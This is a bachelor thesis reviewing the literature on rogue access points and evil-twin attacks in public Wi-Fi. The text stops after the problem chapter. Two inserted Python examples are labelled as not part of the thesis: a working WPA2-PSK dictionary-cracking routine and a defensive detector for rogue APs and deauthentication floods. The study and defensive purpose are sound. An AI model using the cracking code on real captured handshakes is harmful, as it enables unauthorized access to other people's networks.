Academic year: 2021

A SUMMARY REGARDING MITIGATION PROPOSALS OF ROGUE ACCESS POINTS IN PUBLIC WI-FI NETWORKS

A proposal for guidelines to assist in the choice of public Wi-Fi network security

(Swedish title: EN SUMMERING AV MITIGERINGS FÖRSLAG GÄLLANDE LAGLÖSA ACCESS PUNKTER I PUBLIKA WI-FI NÄTVERK)

Bachelor Degree Project in Information Technology IT610G, G2E, 22.5 HP

Spring term 2020

Date of examination: 2020-08-31

Author: Johannes Sandberg, B17johsa@student.his.se

Supervisor: Dennis Modig

Examiner: Ali Padyab


Summary

Because of the popularity of wireless networks and the growing threat from rogue access points, solutions for detecting, avoiding and counteracting them need to be brought to light. Many different techniques exist, but there is no golden rule for what is most suitable for different scenarios or network environments. This is particularly unclear in public Wi-Fi networks.

The purpose of this study was primarily to find the different ways in which a rogue access point can be detected, avoided and counteracted, but also how a network administrator or similar should proceed to choose the solution considered most suitable for their scenario. To answer this, a framework was created that gives clear guidance to a network administrator. The framework is based on the advantages and disadvantages of different approaches, and it points to different choices of approach depending on what is sought. Such factors can be security, usability or deployment.

The study is based on a systematic literature review that used three databases to collect information: ACM Digital Library, IEEE Xplore and ScienceDirect. By querying these databases with specifically formed search terms, a large number of articles could be acquired. The articles were then divided into themes with thematic coding, depending on the content of each article. In the end the study had 37 accepted articles and 4 identified themes that connect 13 categories.

From these themes and their content, a framework was designed that, based on different choices, guides the reader to suitable solutions.

Keywords: wireless local area network, public Wi-Fi, access point, rogue access point, framework, intrusion detection system, intrusion prevention system


Abstract

Due to the popularity of public Wi-Fi and the rising threat of rogue access points (RAPs), solutions for detecting, mitigating and preventing them need to be identified in a more general way. Several techniques exist, but there are no "golden rules" for handling RAPs.

The purpose of this research was mainly to find the different approaches by which RAPs can be detected, mitigated and prevented. With the help of the resulting framework, network administrators can also find the most suitable solution for their environment. The framework is based on the advantages and disadvantages of the different approaches and leads to appropriate choices depending on what is desired regarding security, usability and deployment.

The research is based on a systematic literature review that used three databases to collect information on the topic: ACM Digital Library, IEEE Xplore and ScienceDirect. Articles acquired from these databases were divided into themes with thematic coding, depending on the content of each article.

In total 37 articles were collected and 4 themes were identified, which connect 13 categories.

When the phases of thematic coding were completed, a framework was developed that describes how the most appropriate solution is to be chosen depending on different factors.

Keywords: wireless local area network, access point, rogue access point, intrusion detection, intrusion prevention system


Acknowledgements

This project was supposed to be based on experiments, but due to the Covid-19 outbreak the research was stopped. Thankfully, my supervisor Dennis Modig and examiner Ali Padyab helped me redirect that research into this literature review. Even though the outbreak created challenges, they were available and supportive in this study with Zoom sessions or by actively responding to e-mails to provide feedback.

I would also like to thank my loved ones who have been supportive and cheering me on, while also being understanding. Thank you sincerely!


Table of Contents

1. Introduction

2. Background

2.1 Wi-Fi network security

2.2 Possible attacks in public Wi-Fi networks

2.3 Mitigation against rogue wireless devices

2.3.1 Wireless Intrusion Detection System

2.3.2 Wireless Intrusion Prevention System

3. Problem

3.1 Motivation

3.2 Research goal

3.3 Previous research

4. Method

4.1 Structured Literature Review

4.1.1 Indexing Services

4.1.2 Acquiring articles

4.1.3 Demarcations

4.2 Analysis

4.2.1 Choice of analysis method

4.2.2 Practical analysis procedure

4.3 Ethical Considerations

4.4 Validity

4.5 Article Selection Process

4.5.1 Practical Article Acquiring

4.5.2 Result Representation

5. Result

5.1 Creating themes

5.2 Mitigation approaches

5.2.1 Client-side

5.2.2 Client-side proposals

5.2.2.1 Technical proposals

5.2.2.2 Social proposals

5.2.3 Admin-side

5.2.4 Admin-side proposals

5.2.5 Server-side or system-side

5.2.6 Server-side or system-side proposals

5.2.7 Hybrid

5.2.8 Hybrid proposals

5.3 Implementation

5.3.1 Automation

5.3.2 Simplicity & mobility

5.3.3 Coarse-Grain

5.3.4 Fine-Grain

5.4 Positioning

5.4.1 Indoor positioning

5.4.2 Outdoor positioning

5.5 Informative

5.5.1 Public networks

5.5.2 Detection

5.5.3 Prevention

6. Analysis

6.1 Development of the framework

6.2 Proposed framework

6.2.1 Explanation of framework

7. Discussion

7.1 Evaluation of framework

7.2 Evaluation of the work procedure

7.3 Validity of Results

7.4 Future work

7.5 Research and implications of practice

7.5.1 Research

7.5.2 Implications for practice

8. Conclusion

References

Appendix A – Bibliography

Appendix B – Matrix of Articles and related themes

Appendix C – The proposed framework


1. Introduction

Wireless local area networks (WLANs) have become a universal standard around the world: from a user with a personal off-the-shelf router, to an enterprise with tailor-made hardware for dense and large-scale networks, to public Wi-Fi environments such as hotspots. The reasons are ease of implementation, availability, flexibility and mobility, and above all the reasonable hardware and implementation prices.

Another reason for the increase is the free Wi-Fi services offered to users of smartphones and other mobile devices. The high demand for Internet services during an average day has led many public locations, such as shopping malls, cafés, restaurants and larger events, to offer free Wi-Fi. It is forecast that there will be 454 million public Wi-Fi access points (APs) by the end of 2020 (Wang, Juarez, Kohm, Liu, Yuan, & Song, 2019).

People who want to use the Internet can choose between a Wi-Fi network and a mobile cellular network. Cost often makes Wi-Fi the cheaper choice, but a common problem in Wi-Fi networks is the threat of rogue access points (RAPs) (Alotaibi & Elleithy, 2016).

Since APs are inexpensive, easy to acquire and easy to set up, RAPs are a serious problem. A RAP is, in general, an unauthorized access point: either installed on a network without explicit authorization from the local administrator, or deployed by an adversary to conduct attacks such as man-in-the-middle (MiTM), espionage or other attacks (Sriram, Sahoo, & Agrawal, 2010). Wireless clients might connect to a malicious AP because of RAP attacks such as the Evil Twin (ET). An Evil Twin is a malicious RAP that replicates a legitimate access point (LAP) as closely as possible (Kuo, Chang, & Kao, 2018).

It is troublesome to mitigate RAPs, especially in public network environments, due to the lack of available security implementations. RAPs are easily deployed and hard to mitigate in many scenarios, and they usually target the unaware user, leading to privacy leakage, loss of confidential information and even property damage. The problems RAPs cause, and their rising popularity, make it crucial that they are mitigated (Wang et al., 2019).

The report is divided into eight chapters. Chapter two presents a background to public Wi-Fi networks and attacks, and a more thorough background on rogue access points and current countermeasures. Chapter three explains the problem, the motivation for the study and the aim of the research. Chapter four explains the method and analysis, as well as the practical execution of both. Chapter five presents the results of the practical execution described in chapter four. Chapter six presents the analysis and the framework. Chapter seven discusses the work and results in different aspects. Chapter eight concludes the completed work.


2. Background

One of the most common communication technologies in our society is Wi-Fi, the common name for wireless local area networks (WLANs) based on the IEEE 802.11 standard, which enables routers and devices such as smartphones and laptops to communicate with each other. 802.11 operates in the 2.4 GHz and 5 GHz radio bands. The popularity of Wi-Fi stems primarily from its ease of implementation, availability, flexibility and mobility, and above all from reasonable hardware and implementation prices (Kumar & Paul, 2016). Wireless networks are one of the main pillars of network infrastructure. For wider availability and users' hunger for connectivity, Wi-Fi is a major contributor and is important for establishing a solid core in the network infrastructure (Zhang, Hasegawa, Yamaguchi, & Shimada, 2019).

While technology in the area is advancing rapidly, adoption of countermeasures to new attacks does not always keep pace, so poor infrastructure becomes more common. Old systems using insecure or even outdated methods are examples of lacking security implementations; without WPA/WPA2 support there is no encryption of the communication at all (Lee & Fumagalli, 2019). According to Vanhoef & Piessens (2017), WPA2 is the protocol generally used in modern Wi-Fi networks, and at almost 15 years old it is hard to keep it a valid solution. WPA2 establishes session keys through a key exchange protocol called the 4-way handshake and provides data-confidentiality protocols to encrypt traffic. The handshake was considered secure for a long time, but it has a design flaw: by replaying the third message of the handshake, an attacker can make the supplicant reinstall an already-in-use key (the supplicant also retransmits the fourth message), which resets the nonce and replay counter associated with that key and allows packets to be replayed, decrypted or forged (Vanhoef & Piessens, 2017).

Thus ensuring adequate security in public Wi-Fi networks is a challenge: one of the most widely applied protocols is flawed but still widely used, which can lead to security issues such as privacy and confidentiality leakage (Vanhoef & Piessens, 2017).

Wi-Fi security is crucial to society. Many use Wi-Fi in places such as cafés, restaurants and campus networks. Attackers who test the limits of the security tools available to network operators are a growing threat. One of the primary challenges for Wi-Fi networks is rogue devices that generate DHCP threats, DoS threats or data exfiltration (Cox, Clark, & Owen, 2017). Ma et al. (2008) point out that detecting rogue devices such as rogue access points (RAPs) is one of the IT department's most important security functions: if an attacker is granted physical access, security is compromised.

As mentioned, public Wi-Fi networks face a great many challenges. Security may not always be a priority, and testing security solutions in a real environment before deploying them is, although recommended, not a common practice among administrators or security officers. Since the "come-and-go" and bring-your-own-device (BYOD) mentality is becoming more accepted, public networks such as hotspots and municipal Wi-Fi need to give wireless network security greater consideration. Examples are cafés, offices, hotels, malls and airports. Given the huge deployment of Wi-Fi, the evildoers of the Internet must be considered as well (Kumar & Paul, 2016).


2.1 Wi-fi network security

According to Coleman & Westcott (2014), Wi-Fi is an 802.11 standard whose main function is to act as a gateway into the network infrastructure. This gateway should be protected and monitored at any cost. Protection and authentication methods should be positioned to ensure that only authorized users are given access to resources. If the gateway is not protected, unauthorized access to resources is only a matter of time. Exposing resources is a crucial mistake: intruders can gain access to databases, company secrets or confidential private information about a user. They further mention that a network can also be damaged once an opening is found, and that there are usually ways to find new paths to gain deeper access. Another example given by Coleman & Westcott (2014) is an intruder who manages to shut down a mail server during business hours or spread a trojan internally through the network. Spammers have figured out that open wireless gateways to the Internet can be abused for spamming. Software theft and remote hacking are possibilities on an unsecured gateway. Since wireless networks enable an attacker to reach wired resources, all network resources might be at risk.

Information that passes through the air can be captured using network tools. If proper security is missing, the management interfaces of Wi-Fi equipment can be accessed. Many wireless users are vulnerable to peer-to-peer attacks, but also to DoS attacks. An attacker with the knowledge and proper tools can disable the entire network service and deny users access to the network and its resources (Coleman & Westcott, 2014).

According to Ali, Osman, Mannan & Youssef (2019), Wi-Fi networks are either open or closed. A closed network has more possibilities to mitigate intruders in general, because unauthorized users cannot reach resources and not everyone is able to join the network. Open networks, often referred to as public Wi-Fi, are more challenging since they have fewer authorization demands: in a public Wi-Fi network, anyone should be able to access the network. Examples of public Wi-Fi networks are hotspots and municipal networks. They usually use one of three categories of authentication:

• Captive portal

• Direct/open access

• Username and password

While all three are useful, captive portals are the most common. A captive portal requires the user to go through a portal session, usually a web page with information such as a privacy policy and terms-of-service (TOS) documents, possibly with a social login or registration form. After the user has accepted the agreements, the user is sent to a landing page chosen by the hotspot owner. The captive portal is usually a good way to inform the user about settings, data privacy and information-gathering activities, and to authenticate guests if needed (Ali, Osman, Mannan, & Youssef, 2019). With an understanding of why security is a serious problem and proper actions are in dire need, the next section explains the potential attacks a public Wi-Fi network can fall victim to, as well as countermeasures.


2.2 Possible attacks in public Wi-Fi networks

There are several potential attacks that can be performed in public Wi-Fi networks. These attacks are either intentional or unintentional, which is important to keep in mind. To protect the network infrastructure sufficiently, a professional generally keeps up to date on new and old attacks. Listed below are common public Wi-Fi attacks according to Coleman & Westcott (2014):

Rogue wireless devices: Rogue devices are essentially any unauthorized Wi-Fi devices that are not under the control of a network administrator. They can be either internal or external: an employee might install a RAP for better network performance, or an attacker might install one for malicious purposes. The threat varies with placement, but if the device is connected to the wired network infrastructure the threat is major. The challenge in avoiding these attacks is that any small office/home office (SOHO) Wi-Fi access point or router can act as a rogue device, and such devices are easy to get hold of. A rogue device outside the administrator's control might also be configured without authorization and authentication security, leaving it an open gate to the network resources.

Peer-to-Peer Attacks: An attack usually performed in infrastructure mode or ad hoc mode. In ad hoc mode the independent basic service set (IBSS) is the main function; an IBSS uses peer-to-peer connections between clients. File sharing is a common use of ad hoc mode, which means that resource access must be managed. Users connected to the same BSS and using the same VLAN must be protected from each other, since they all reside in the same layer 2 segment. An attacker can exploit this to gain unauthorized access to resources.

Eavesdropping: Anyone within range can receive the wireless transmissions. This means that anyone can sniff the traffic, which can be prevented using strong encryption. Eavesdropping on wireless networks is usually split into two categories.

Casual eavesdropping: Also called WLAN discovery. This method exploits the 802.11 frame exchange methods defined in the 802.11-2012 standard. WLAN discovery tools exist to find open WLANs. The tools use active scanning, sending null probe requests across all channels with the intent of receiving probe response frames containing wireless network information. Passive scanning methods also exist.

Malicious eavesdropping is the second category. It is more harmful than casual eavesdropping, since 802.11 protocol analysers are used without authorization to capture the wireless communications. Such use of a protocol analyser is considered illegal, and many countries make it illegal to listen in on any type of electromagnetic communication. Commercial and freeware protocol analysers are viewed as tools for network administrators, since analysers for the 802.11 protocols are passive and can capture any transmissions within range. The tools exist for troubleshooting purposes, but malicious intent will always exist. Strong dynamic encryption such as CCMP/AES is a given requirement for security precautions such as data privacy. If transmissions are in clear text, the messages can be reassembled and read.


Encryption cracking: Several encryption methods have been cracked. Wired Equivalent Privacy (WEP) encryption is still supported for backwards compatibility, and available tools can crack it within minutes. Usually an attacker gathers a large number of encrypted packets using a protocol analyser and then runs the gathered data through a WEP-cracking program.

Authentication Attacks: A troublesome attack that might expose network resources if authentication credentials are compromised. Authorization to network resources can be granted either using an 802.1X/EAP solution or pre-shared key (PSK) authentication. Since the 802.11 standard does not define which EAP method should be used, one of several choices must be made, some more secure than others. Attackers capture the frame exchange when authentication is performed and then run the captured traffic through a dictionary tool to obtain user credentials such as passwords and account names.
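The dictionary attack described above, as an added example (not code from the thesis or the cited sources): for WPA2-PSK it derives the PMK and PTK exactly as IEEE 802.11i specifies and checks each candidate passphrase against the MIC of handshake message 2. The "captured" handshake is constructed in the block from a known passphrase so the example runs offline; the SSID, MAC addresses, nonces, RSN information element and wordlist are assumed values.

```python
"""WPA2-PSK dictionary check against a captured 4-way handshake.

Added example (not from the thesis): derive PMK -> PTK -> KCK per IEEE 802.11i and
verify the MIC of EAPOL-Key message 2 for each candidate passphrase. The "capture"
is constructed in-block from a known passphrase so the example runs offline."""
import hashlib
import hmac
from typing import Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    # 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated to 64 bytes.
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(ANonce,SNonce)||max(ANonce,SNonce))
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    # Key descriptor version 2 (WPA2-PSK): MIC = HMAC-SHA1(KCK, EAPOL frame with MIC field zeroed)[:16].
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def eapol_msg2(snonce: bytes, rsn_ie: bytes, replay_counter: int = 1) -> bytes:
    """Constructed EAPOL-Key message 2 (supplicant -> AP) with the MIC field zeroed."""
    key_info = (0x010A).to_bytes(2, "big")  # pairwise key, MIC present, descriptor version 2
    body = (b"\x02" + key_info + b"\x00\x00" + replay_counter.to_bytes(8, "big")
            + snonce + bytes(16) + bytes(8) + bytes(8)   # key IV, key RSC, key ID
            + bytes(16)                                  # key MIC, zeroed for the computation
            + len(rsn_ie).to_bytes(2, "big") + rsn_ie)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


# Constructed handshake parameters (assumed values, not from any real capture).
SSID = "CafeGuest"
AA = bytes.fromhex("aabbcc000001")       # AP (authenticator) MAC
SPA = bytes.fromhex("001122334455")      # client (supplicant) MAC
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP group/pairwise, PSK AKM
WORDLIST = ["password", "12345678", "welcome1", "coffee2020", "letmein!"]  # constructed wordlist


def capture_for(passphrase: str) -> dict:
    """Stand-in for a pcap of message 2: what a sniffer within range would record."""
    kck = derive_ptk(pmk_from_passphrase(passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    frame = eapol_msg2(SNONCE, RSN_IE)
    return {"ssid": SSID, "aa": AA, "spa": SPA, "anonce": ANONCE, "snonce": SNONCE,
            "eapol": frame, "mic": eapol_mic(kck, frame)}


def dictionary_attack(capture: dict, wordlist) -> Optional[str]:
    """Return the passphrase whose derived KCK reproduces the captured MIC, or None."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        kck = derive_ptk(pmk, capture["aa"], capture["spa"], capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"]), capture["mic"]):
            return candidate
    return None


if __name__ == "__main__":
    print("weak PSK recovered:", dictionary_attack(capture_for("coffee2020"), WORDLIST))
    print("strong PSK recovered:", dictionary_attack(capture_for("gB7#qv9Lp2!xRw4mZ"), WORDLIST))
```

A real capture needs both MAC addresses, both nonces and one MIC-bearing handshake message; tools such as aircrack-ng and hashcat perform this same derivation at scale. The attack only succeeds if the passphrase is in the wordlist, which is the argument for long random PSKs or, in public networks, for 802.1X instead of a shared secret.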

MAC spoofing: Every 802.11 radio has a physical address known as a MAC address, a 12-digit hexadecimal number. The MAC address is easy to read in the layer 2 headers of 802.11 frames. Manufacturers often implement MAC filtering on access points; MAC filters usually apply rules that allow only specific clients' traffic. But MAC addresses can be impersonated, or "spoofed", which is an easy way to bypass a MAC filter. In the Windows operating system (OS) the radio's MAC address can simply be edited using Device Manager or by manipulating the registry, and third-party software exists for the purpose. Since spoofing is possible, filtering is not enough; it is commonly found in legacy security architectures.

Management exploits: Wireless hardware devices such as APs and WLAN controllers are managed by administrators through management interfaces, accessed using web interfaces, command line interfaces, console connections or the Simple Network Management Protocol (SNMP). Usually Telnet, Secure Shell (SSH) and Hypertext Transfer Protocol Secure (HTTPS) are used for these. Since the default settings and credentials of manufacturers' hardware are listed on the Internet, attackers can easily exploit them. Because open management interfaces are a popular target, default settings should be changed, and unused services such as Telnet interfaces should always be disabled.

Attackers use openings in these interfaces to perform different attacks or gain access to unauthorized resources. If management is not protected, an attacker might shut down the device or change ACLs to open up further holes. Recovering from this is also a heavy task in large-scale networks.

Wireless Hijacking: Wireless hijacking is a common attack where the attacker configures access point software on a laptop or other device able to turn a Wi-Fi client into an access point. A huge variety of devices can be used; Raspberry Pis or Wi-Fi USB devices can act as the attacker's tool. The attacker then performs what is called an evil twin attack: the device is configured to be as identical to a public hotspot or municipal AP as possible. The attacker then sends spoofed disassociation or deauthentication frames, or uses an RF jammer, which forces users associated with the public AP to roam over to the evil twin instead. When users are associated with the evil twin, the attacker has access to their layer 2 transmissions; if the attacker has also configured a DHCP server, the users' layer 3 traffic is hijacked as well. If the attacker's device is also equipped with a second NIC, man-in-the-middle attacks can be performed: from the attacker's AP, traffic is routed on to the original network, leaving the users unaware of the hijacking. The attacker can then perform peer-to-peer attacks and remain hidden.

Denial of Service (DoS): Although DoS attacks are generally discussed more in the context of wired networks, they exist in wireless environments as well. An attacker with internal information or proper tools can disrupt or disable a Wi-Fi network by denying access to network resources. As in wired networks, the difficulty with DoS attacks is finding the source and eliminating it; monitoring services help, but locating the source is a challenge. DoS attacks can be divided into two categories: intentional RF jamming and unintentional jamming. Intentional jamming is when an attacker deliberately causes interference in the unlicensed frequencies. Unintentional jamming is interference with no intent to cause harm, for instance from a microwave oven or another access point on the same unlicensed frequency.

Vendor-Specific Attacks: Security holes in vendors' firmware are a regular occurrence. Once they become known, attackers quickly exploit them while the vendors try to fix the breach and deliver an update as quickly as possible. In a network infrastructure where the administrator is not up to date with security events and does not apply the fix in time, or ever, attacks will occur.

Since public Wi-Fi has its limitations regarding authentication, all the attacks mentioned above make it a top priority to consider solutions that prevent them. The RAP attack in particular is a growing and popular approach among attackers (Alotaibi & Elleithy, 2016).

APs are inexpensive, easy to acquire and easy to set up. This also applies to RAPs, which makes the attack cost-effective. Many users use public Wi-Fi networks, which increases the chance of connecting to a RAP such as an ET. An ET is a malicious RAP that replicates a legitimate access point (LAP) as closely as possible (Kuo, Chang, & Kao, 2018). Unaware users will most likely be the victims, leading to leakage of confidential information or further consequences. The problems RAPs cause, and their rising popularity, make it crucial that they are mitigated (Wang et al., 2019).

As mentioned, a whole city might provide users with public Wi-Fi behind a captive portal, but rogue devices tricking people into connecting to them, and DoS attacks that might create economic losses, are a very real threat and may already be happening. Earlier research indicates that a central monitoring solution such as a WIPS, IDS or IPS can stop many attackers (Ali, Osman, Mannan, & Youssef, 2019).


2.3 Mitigation against rogue wireless devices

Rogue devices differ depending on how they are implemented. There are roughly four types according to Ma, Teymorian & Cheng (2008): unauthorized, improperly configured, phishing and compromised APs.

• Unauthorized APs - A co-worker or an attacker installs another AP and connects it to the internal LAN without the administrator's permission or knowledge.

• Improperly configured APs - Caused by an administrator with poor security knowledge, non-updated drivers or faulty firmware/software. An AP can also become improperly configured through physical damage or because it has multiple network cards.

• Phishing APs – Fabricated by an adversary with the intention of performing phishing attacks.

• Compromised APs – APs that have been compromised by an attacker to reveal security credentials. They are hard to detect and extremely threatening in commodity Wi-Fi networks, since the AP is not malfunctioning and does not indicate any faulty behaviour.

One of the most threatening RAP attacks, according to Kuo, Chang & Kao (2018), is the Evil Twin (ET), an intentional, unauthorized phishing RAP. It copies the Service Set Identifier (SSID), essentially the wireless network's name visible on the user's device when searching for Wi-Fi networks, and the MAC address of the legitimate access point (LAP). If the adversary uses two wireless network interface cards (WNICs), there is the possibility of eavesdropping on the communication. Many compare the ET to the WLAN equivalent of phishing scams (Kuo, Chang, & Kao, 2018).

Mitigating rogue wireless devices is not completely obvious. Physical security, such as hiding the APs and Ethernet sockets, can prevent internal attacks, but from an external viewpoint it is challenging. MAC address filtering is a solution as well, but since spoofing is an easy attack to perform it is not completely safe. Instead, stronger security procedures are needed (Coleman & Westcott, 2014).

2.3.1 Wireless Intrusion Detection System

Wireless Intrusion Detection Systems (WIDS) are an extension of intrusion detection systems (IDS). A WIDS inspects transmitted packets and compares them to some form of filter to evaluate whether a packet contains anything that might be a potential risk according to the filter (Suresh, Sukumar, & Ayyasamy, 2020).

According to Coleman & Westcott (2014), a WIDS can detect rogue devices, and to some extent DoS and hijacking. It monitors best at layer 2, where it can detect MAC spoofing and disassociation and deauthentication attacks, and it may be configured with up to 100 different security risks. But since a WIDS is intended for layer 2 detection, layer 1 attacks such as RF jamming can only be handled by a spectrum analyser, a tool for detecting activity in the frequency domain. It can detect both intentional and unintentional jamming. Spectrum analysers are categorized as mobile or distributed; mobile is the common solution, while distributed analysers can detect and classify the RF interference, which helps locate the interfering device. Some APs have an integrated spectrum analyser card that offers basic functionality (Coleman & Westcott, 2014).

2.3.2 Wireless Intrusion Prevention System

A Wireless Intrusion Prevention System (WIPS) monitors the WLAN for malicious or odd behaviour and can react to suspicious activity by blocking or preventing it. It combines a firewall and an IDS: like a WIDS it detects suspicious packets, but it also acts proactively by stopping the attacker in different ways depending on the implementation. For a WIPS to be effective, it should be able to automatically detect and classify wireless threats. WIPSs have well-developed recognition of ongoing attacks and an active response to and prevention of attacks that will occur, have occurred or are occurring in real time (Chen, Yao, & Wang, 2009).

A WIPS categorizes APs and client radios into four or more classifications: infrastructure device, known device, unknown device or rogue device. Depending on the vendor, different naming or categorization might be used (Coleman & Westcott, 2014).
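The layer 2 checks described in the wireless hijacking passage of section 2.2 and in sections 2.3.1 and 2.3.2, as an added example that is not code from the thesis or from Coleman & Westcott: it classifies every beacon-advertising BSSID into the four WIPS classes above (infrastructure, known, unknown, rogue), treats the operator's SSID on an unowned BSSID as an evil twin, and flags the deauthentication burst that precedes a hijack. The authorized-AP inventory, the neighbour list and the frame summaries are constructed; a real deployment would feed it beacon, probe-response and deauth/disassoc summaries from a monitor-mode capture.

```python
"""Toy WIDS/WIPS classifier: evil-twin and deauth-flood detection over management frames.

Added example (not from the thesis): inventory, neighbour list and frames are constructed."""
from collections import defaultdict

# Constructed inventory of the operator's own APs, keyed by BSSID (assumed values).
AUTHORIZED_APS = {
    "aa:bb:cc:00:00:01": {"ssid": "CityFreeWiFi", "channel": 6, "security": "open"},
    "aa:bb:cc:00:00:02": {"ssid": "CityFreeWiFi", "channel": 11, "security": "open"},
}
# BSSIDs seen before and judged harmless, e.g. a neighbouring café (assumed).
KNOWN_NEIGHBOURS = {"de:ad:be:ef:00:10"}

# Constructed frame summaries, timestamps in milliseconds, as a sniffer would produce them.
FRAMES = [
    {"t": 0, "type": "beacon", "bssid": "aa:bb:cc:00:00:01", "ssid": "CityFreeWiFi", "channel": 6, "security": "open"},
    {"t": 100, "type": "beacon", "bssid": "aa:bb:cc:00:00:02", "ssid": "CityFreeWiFi", "channel": 11, "security": "open"},
    {"t": 200, "type": "beacon", "bssid": "de:ad:be:ef:00:10", "ssid": "CafeGuest", "channel": 1, "security": "wpa2"},
    # Evil twin: the operator's SSID advertised by a BSSID the operator does not own.
    {"t": 300, "type": "beacon", "bssid": "02:13:37:00:00:99", "ssid": "CityFreeWiFi", "channel": 1, "security": "open"},
    # Unrelated network: unknown, but not rogue.
    {"t": 400, "type": "beacon", "bssid": "66:77:88:00:00:01", "ssid": "Hotel-Lobby", "channel": 36, "security": "wpa2"},
]
# A spoofed deauthentication burst "from" the legitimate AP: 40 broadcast frames, 50 ms apart.
FRAMES += [{"t": 1000 + i * 50, "type": "deauth", "src": "aa:bb:cc:00:00:01",
            "dst": "ff:ff:ff:ff:ff:ff"} for i in range(40)]


def classify_bssid(bssid, ssid, channel, security):
    """WIPS-style classes: infrastructure, known, unknown, rogue."""
    if bssid in AUTHORIZED_APS:
        ref = AUTHORIZED_APS[bssid]
        # Our BSSID, but advertised with another SSID, channel or security setting: it is being cloned.
        if (ref["ssid"], ref["channel"], ref["security"]) != (ssid, channel, security):
            return "rogue"
        return "infrastructure"
    if bssid in KNOWN_NEIGHBOURS:
        return "known"
    if ssid in {ap["ssid"] for ap in AUTHORIZED_APS.values()}:
        return "rogue"  # evil twin: our SSID on a BSSID we do not own
    return "unknown"


def classify_frames(frames):
    """Map every BSSID seen in a beacon to a class; a 'rogue' verdict is sticky."""
    verdicts = {}
    for f in frames:
        if f["type"] != "beacon":
            continue
        verdict = classify_bssid(f["bssid"], f["ssid"], f["channel"], f["security"])
        if verdicts.get(f["bssid"]) != "rogue":
            verdicts[f["bssid"]] = verdict
    return verdicts


def deauth_floods(frames, window_ms=1000, threshold=10):
    """Sources sending more than `threshold` deauth/disassoc frames within any `window_ms` window."""
    times = defaultdict(list)
    for f in frames:
        if f["type"] in ("deauth", "disassoc"):
            times[f["src"]].append(f["t"])
    flagged = {}
    for src, ts in times.items():
        ts.sort()
        lo, peak = 0, 0
        for hi in range(len(ts)):
            while ts[hi] - ts[lo] > window_ms:   # slide the window start forward
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak > threshold:
            flagged[src] = peak
    return flagged


def alerts(frames):
    """Alerts a WIDS would raise; a WIPS would additionally act on them (e.g. contain the rogue)."""
    out = []
    for bssid, verdict in classify_frames(frames).items():
        if verdict == "rogue":
            out.append(f"ROGUE AP {bssid}: evil twin of an authorized SSID")
    for src, peak in deauth_floods(frames).items():
        note = " (source address spoofs our own AP)" if src in AUTHORIZED_APS else ""
        out.append(f"DEAUTH FLOOD from {src}: {peak} frames in one second{note}")
    return out


if __name__ == "__main__":
    for line in alerts(FRAMES):
        print(line)
```

The deauth check matches only because the attacker spoofs the legitimate AP's address, which is why a WIDS keys on rate rather than on source alone; 802.11w (management frame protection) removes this vector where clients support it, but an open public hotspot usually cannot rely on it.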


3. Problem

The Internet has become a great tool to our society and is a key factor when considering infrastructure. To further extend connectivity Wi-Fi technology is implemented. Wi-Fi

features mobility and quick and easy setup which makes it an economical and scalable choice.

A problem with Wi-Fi is weak security considerations and weak policies that generally become implemented. This introduces security threats, just as easy as an off-the-shelf AP can be implemented by an employee, a rogue AP can be implemented by an attacker. Users are commonly unaware of the dangers associated with wireless access. Few consider the potential threats when connecting to a network, especially to public Wi-Fi (Jang, Kang, Mohaisen, &

Nyang, 2020).

Agarwal (2019) explains the ease of sniffing traffic in wireless communications. Since an attacker solely needs to be within broadcast range of the transmitter for passive sniffing. This is also a challenging task to apprehend. He also mentions the great deals of threats regarding public Wi-Fi security and points out rogue devices and evil twin (ET) attacks as major concerns. But to mitigate ET attacks and alike, deployment of tailormade hardware, precise tools/devices, white lists of legitimate APs or modification of protocols may be needed. They might be useful under specific network conditions but due to false positives, scalability, and the expenses to deploy and maintain are major concerns to keep in consideration (Agarwal, 2019).

As mentioned earlier, rogue devices pose a great threat to wireless network security. As Hui-young (2020) further points out, users are often unaware of the threats in wireless networks. RAPs are hard to detect even for professionals. This makes RAPs especially dangerous in networks with unaware clients. Confidential data or private information might be compromised, which could lead to a vast number of problems for companies or users.

According to Liu et al. (2019), Wi-Fi is a major communication utility for connecting wireless devices in LANs and the Internet of Things (IoT). Regarding IoT, they point out that billions of devices rely on Wi-Fi because of its ease of implementation. The issue is the number of wireless network security threats that these devices are exposed to.

WEP, WPA and WPA2 are flawed and there are security issues regarding the protocols. Traditional network security does not solve this, since most attacks occur at the data link layer. Hence, better options need to be provided (Zhang, Hasegawa, Yamaguchi, & Shimada, 2019).

Kao et al. (2014) discuss how RAPs can be set up for two reasons. The first is a user bypassing network rules to get a less restricted Internet experience. The second is the malicious intent of capturing user credentials with packet sniffers or phishing web pages (Kao, Chen, Chang, & Chu, 2014). The phishing web page might be a captive portal identical to the legitimate operator's version (Vansickle, Abegaz, & Payne, 2019).

